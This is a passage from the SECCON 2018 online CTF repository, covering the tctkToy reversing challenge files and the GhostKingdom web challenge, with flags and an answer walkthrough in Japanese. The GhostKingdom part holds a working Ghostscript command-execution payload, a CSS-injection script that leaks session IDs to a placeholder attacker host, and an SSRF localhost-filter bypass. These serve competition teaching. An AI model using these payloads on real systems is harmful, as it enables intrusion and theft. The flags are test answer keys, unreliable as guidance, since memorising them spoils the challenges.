--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SECCON/SECCON2018_online_CTF/30ca811bab4c1dfb68c6b4fd0e5d682487b861ff/Reversing/tctkToy/build/tctkToy/Resource.h


--------------------------------------------------------------------------------
/Reversing/tctkToy/build/tctkToy/small.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SECCON/SECCON2018_online_CTF/30ca811bab4c1dfb68c6b4fd0e5d682487b861ff/Reversing/tctkToy/build/tctkToy/small.ico


--------------------------------------------------------------------------------
/Reversing/tctkToy/build/tctkToy/stdafx.cpp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SECCON/SECCON2018_online_CTF/30ca811bab4c1dfb68c6b4fd0e5d682487b861ff/Reversing/tctkToy/build/tctkToy/stdafx.cpp


--------------------------------------------------------------------------------
/Reversing/tctkToy/build/tctkToy/stdafx.h:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SECCON/SECCON2018_online_CTF/30ca811bab4c1dfb68c6b4fd0e5d682487b861ff/Reversing/tctkToy/build/tctkToy/stdafx.h


--------------------------------------------------------------------------------
/Reversing/tctkToy/build/tctkToy/targetver.h:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SECCON/SECCON2018_online_CTF/30ca811bab4c1dfb68c6b4fd0e5d682487b861ff/Reversing/tctkToy/build/tctkToy/targetver.h


--------------------------------------------------------------------------------
/Reversing/tctkToy/build/tctkToy/tctkInfo.bmp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SECCON/SECCON2018_online_CTF/30ca811bab4c1dfb68c6b4fd0e5d682487b861ff/Reversing/tctkToy/build/tctkToy/tctkInfo.bmp


--------------------------------------------------------------------------------
/Reversing/tctkToy/build/tctkToy/tctkToy.aps:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SECCON/SECCON2018_online_CTF/30ca811bab4c1dfb68c6b4fd0e5d682487b861ff/Reversing/tctkToy/build/tctkToy/tctkToy.aps


--------------------------------------------------------------------------------
/Reversing/tctkToy/build/tctkToy/tctkToy.cpp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SECCON/SECCON2018_online_CTF/30ca811bab4c1dfb68c6b4fd0e5d682487b861ff/Reversing/tctkToy/build/tctkToy/tctkToy.cpp


--------------------------------------------------------------------------------
/Reversing/tctkToy/build/tctkToy/tctkToy.h:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SECCON/SECCON2018_online_CTF/30ca811bab4c1dfb68c6b4fd0e5d682487b861ff/Reversing/tctkToy/build/tctkToy/tctkToy.h


--------------------------------------------------------------------------------
/Reversing/tctkToy/build/tctkToy/tctkToy.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SECCON/SECCON2018_online_CTF/30ca811bab4c1dfb68c6b4fd0e5d682487b861ff/Reversing/tctkToy/build/tctkToy/tctkToy.ico


--------------------------------------------------------------------------------
/Reversing/tctkToy/build/tctkToy/tctkToy.rc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SECCON/SECCON2018_online_CTF/30ca811bab4c1dfb68c6b4fd0e5d682487b861ff/Reversing/tctkToy/build/tctkToy/tctkToy.rc


--------------------------------------------------------------------------------
/Reversing/tctkToy/build/tctkToy/tctkToy.vcxproj.filters:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="utf-8"?>
 2 | <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
 3 |   <ItemGroup>
 4 |     <Filter Include="Source Files">
 5 |       <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
 6 |       <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
 7 |     </Filter>
 8 |     <Filter Include="Header Files">
 9 |       <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
10 |       <Extensions>h;hh;hpp;hxx;hm;inl;inc;ipp;xsd</Extensions>
11 |     </Filter>
12 |     <Filter Include="Resource Files">
13 |       <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
14 |       <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
15 |     </Filter>
16 |   </ItemGroup>
17 |   <ItemGroup>
18 |     <ClInclude Include="Resource.h">
19 |       <Filter>Header Files</Filter>
20 |     </ClInclude>
21 |     <ClInclude Include="tctkToy.h">
22 |       <Filter>Header Files</Filter>
23 |     </ClInclude>
24 |   </ItemGroup>
25 |   <ItemGroup>
26 |     <ClCompile Include="stdafx.cpp">
27 |       <Filter>Source Files</Filter>
28 |     </ClCompile>
29 |     <ClCompile Include="tctkToy.cpp">
30 |       <Filter>Source Files</Filter>
31 |     </ClCompile>
32 |   </ItemGroup>
33 |   <ItemGroup>
34 |     <ResourceCompile Include="tctkToy.rc">
35 |       <Filter>Resource Files</Filter>
36 |     </ResourceCompile>
37 |   </ItemGroup>
38 |   <ItemGroup>
39 |     <Image Include="small.ico">
40 |       <Filter>Resource Files</Filter>
41 |     </Image>
42 |     <Image Include="tctkToy.ico">
43 |       <Filter>Resource Files</Filter>
44 |     </Image>
45 |     <Image Include="face.bmp">
46 |       <Filter>Resource Files</Filter>
47 |     </Image>
48 |   </ItemGroup>
49 | </Project>


--------------------------------------------------------------------------------
/Reversing/tctkToy/build/tctkToy/tctkToy.vcxproj.user:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" encoding="utf-8"?>
2 | <Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
3 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
4 |     <LocalDebuggerCommandArguments>1</LocalDebuggerCommandArguments>
5 |     <DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>
6 |   </PropertyGroup>
7 | </Project>


--------------------------------------------------------------------------------
/Reversing/tctkToy/files/66da8fc7dd320bbd14a9ebba148402754d591e33:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SECCON/SECCON2018_online_CTF/30ca811bab4c1dfb68c6b4fd0e5d682487b861ff/Reversing/tctkToy/files/66da8fc7dd320bbd14a9ebba148402754d591e33


--------------------------------------------------------------------------------
/Reversing/tctkToy/files/file.zip_5bd5bdb6eaf308b509af1c466b8a76578b75cdd9:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SECCON/SECCON2018_online_CTF/30ca811bab4c1dfb68c6b4fd0e5d682487b861ff/Reversing/tctkToy/files/file.zip_5bd5bdb6eaf308b509af1c466b8a76578b75cdd9


--------------------------------------------------------------------------------
/Reversing/tctkToy/flag.txt:
--------------------------------------------------------------------------------
1 | SECCON{a683618184fc18105b7157a52727d004681844be54fd792add4c90ff15a66e6f}


--------------------------------------------------------------------------------
/Reversing/tctkToy/question.txt:
--------------------------------------------------------------------------------
1 | [Challenge Title]
2 | tctkToy
3 | 
4 | [Challenge document]
5 | The tctkToy was a fragile Windows application toy.
6 | Reverse and repair it in order to work well.
7 | SUPPORT: Recommend using Windows10 machine to run successfully.
8 | 
9 | 


--------------------------------------------------------------------------------
/Web/GhostKingdom/answer.txt:
--------------------------------------------------------------------------------
 1 | ===========================================================================
 2 | ★ GhostKingdom for SECCON 2018 ONLINE  by KeigoYAMAZAKI, 2018.08.31-
 3 | ===========================================================================
 4 | 
 5 | 概要: CSSインジェクション ＋ GhostMagickの任意のコード実行
 6 | 
 7 | 
 8 | 1. 問題文にある http://ghostkingdom.pwn.seccon.jp/FLAG/ にアクセス
 9 | 
10 | 2. フラグのありかが分かるが、ファイル名が分からないためフラグは見れない
11 | 
12 | 3. /FLAG/ には、トップへのリンクがあるので、リンクをクリック
13 | 
14 | 4. ログインと、新規会員登録の画面が表示される
15 | 
16 | 5. 新規会員登録をおこなう
17 | 
18 | 6. 登録した会員でログインをおこなう
19 | 
20 | 7. ログイン後メニューに以下の3つが存在。3番目についてはローカルからのみ使えることが分かる
21 | 　・Message to admin
22 | 　・Take a screenshot
23 | 　・Upload image  * Only for users logged in from the local network
24 | 
25 | 8. Message to admin をクリック
26 | 
27 | 9. Type: Emergency を選択した時に、Base64化されたスタイルシートの送信を確認。
28 | 　CSSインジェクションが可能であることが分かる。
29 | 　また、hiddenパラメータ「csrf」にセッションIDが出力されていることが分かる
30 | 
31 | 10. Take a screenshot をクリック。URLそのままでボタンを押してスクリーンショット撮影を確認
32 | 　※負荷軽減のため、30秒に1回しか撮影できないように制限。ごめん。
33 | 
34 | 11. 7のメッセージを受けて、http://localhost/ や http://127.0.0.1/ の撮影を試みると、
35 | 　以下のエラーメッセージが表示される。
36 | 　You can not use URLs that contain the following keywords: 127, ::1, local
37 | 
38 | 12. 例えば、http://2130706433/ などのテクニックで、127.0.0.1 からページにアクセス。
39 | 　ログイン画面の「from internet」が「from localhost」に変化していることが分かる
40 | 
41 | 13. http://2130706433/?user=ymzkei5&pass=manager&action=login のようにログインさせる。
42 | 　ログイン後メニューで、使えなかった3番目のメニューが表示されていることを確認
43 | 
44 | 14. 9のCSSインジェクションを通じて、localhostからログインさせたセッションIDを奪取
45 | 
46 | 　[参考] CSS Injection ++ - 既存手法の概観と対策 - Speaker Deck
47 | 　https://speakerdeck.com/lmt_swallow/css-injection-plus-plus-ji-cun-shou-fa-falsegai-guan-todui-ce
48 | 
49 | 　input[valuei^="a"]{background:url(http://example.jp/?sid=a)}
50 | 　input[valuei^="b"]{background:url(http://example.jp/?sid=b)}
51 | 　...
52 | 
53 | 　input[valuei^="aa"]{background:url(http://example.jp/?sid=aa)}
54 | 　input[valuei^="ab"]{background:url(http://example.jp/?sid=ab)}
55 | 　...
56 | 
57 | 　input[valuei^="aba"]{background:url(http://example.jp/?sid=aba)}
58 | 　input[valuei^="abb"]{background:url(http://example.jp/?sid=abb)}
59 | 　...
60 | 
61 | 15. セッションIDを自分のブラウザにセットして、メニューにアクセス
62 | 
63 | 16. 使えるようになった、Upload image をクリック
64 | 
65 | 17. 1MB未満のJpegをアップロードして表示、さらにGIFに変換する機能があることが分かる。
66 | 　機能の内容と、/ghostMagick.cgi?action=convert という名前から、GhostScriptのRCEを
67 | 　攻撃すれば良さそうなことが分かる
68 | 
69 | 18. RCEを通じて、/var/www/html/FLAG/ の中のフラグファイルを表示する
70 | 
71 | 


--------------------------------------------------------------------------------
/Web/GhostKingdom/exploit(private).jpg:
--------------------------------------------------------------------------------
1 | %!PS
2 | userdict /setpagedevice undef
3 | legal
4 | { null restore } stopped { pop } if
5 | legal
6 | mark /OutputFile (%pipe%id;pwd;ls -al /;ls -alR /var/www/html;ls -alR /var/www/html/images;ls -al /var/www/html/FLAG;fgrep '' /var/www/html/FLAG/*;) currentdevice putdeviceprops


--------------------------------------------------------------------------------
/Web/GhostKingdom/exploit(private).pl:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/perl
 2 | # by KeigoYAMAZAKI, 2018.10.10-
 3 | 
 4 | use MIME::Base64;
 5 | my $YOURWEBSITE = 'http://YOUR-WEBSITE.EXAMPLE.JP/cssinj=';
 6 | 
 7 | print `curl --digest -c coo 'http://ghostkingdom.pwn.seccon.jp/?user=ymzkei5&pass=manager&action=login'`;
 8 | 
 9 | print `curl --digest -b coo --verbose 'http://ghostkingdom.pwn.seccon.jp/?url=http%3A%2F%2F2130706433%2F%3Fuser%3Dymzkei5%26pass%3Dmanager%26action%3Dlogin&action=sshot2'`;
10 | 
11 | while(<>) {
12 |   chomp;
13 |   my $c = $_;
14 |   my $css = '';
15 |   foreach(split(//, 'abcdef0123456789')) {
16 |     $css .= qq#input[value^="$c$_"]{background:url($YOURWEBSITE$c$_)}#;
17 |   }
18 |   $css = encode_base64($css);
19 |   $css =~ s/[\r\n]+//g;
20 |   print `curl --digest -b coo --verbose 'http://ghostkingdom.pwn.seccon.jp/?url=http%3A%2F%2F2130706433%2F%3Fcss%3d$css%26msg%3da%26action%3Dmsgadm2&action=sshot2'`;
21 | }
22 | 


--------------------------------------------------------------------------------
/Web/GhostKingdom/flag.txt:
--------------------------------------------------------------------------------
1 | SECCON{CSSinjection+GhostScript/ImageMagickRCE}


--------------------------------------------------------------------------------
/Web/GhostKingdom/question.txt:
--------------------------------------------------------------------------------
1 | 
2 | http://ghostkingdom.pwn.seccon.jp/FLAG/
3 | 
4 | 
5 | 


--------------------------------------------------------------------------------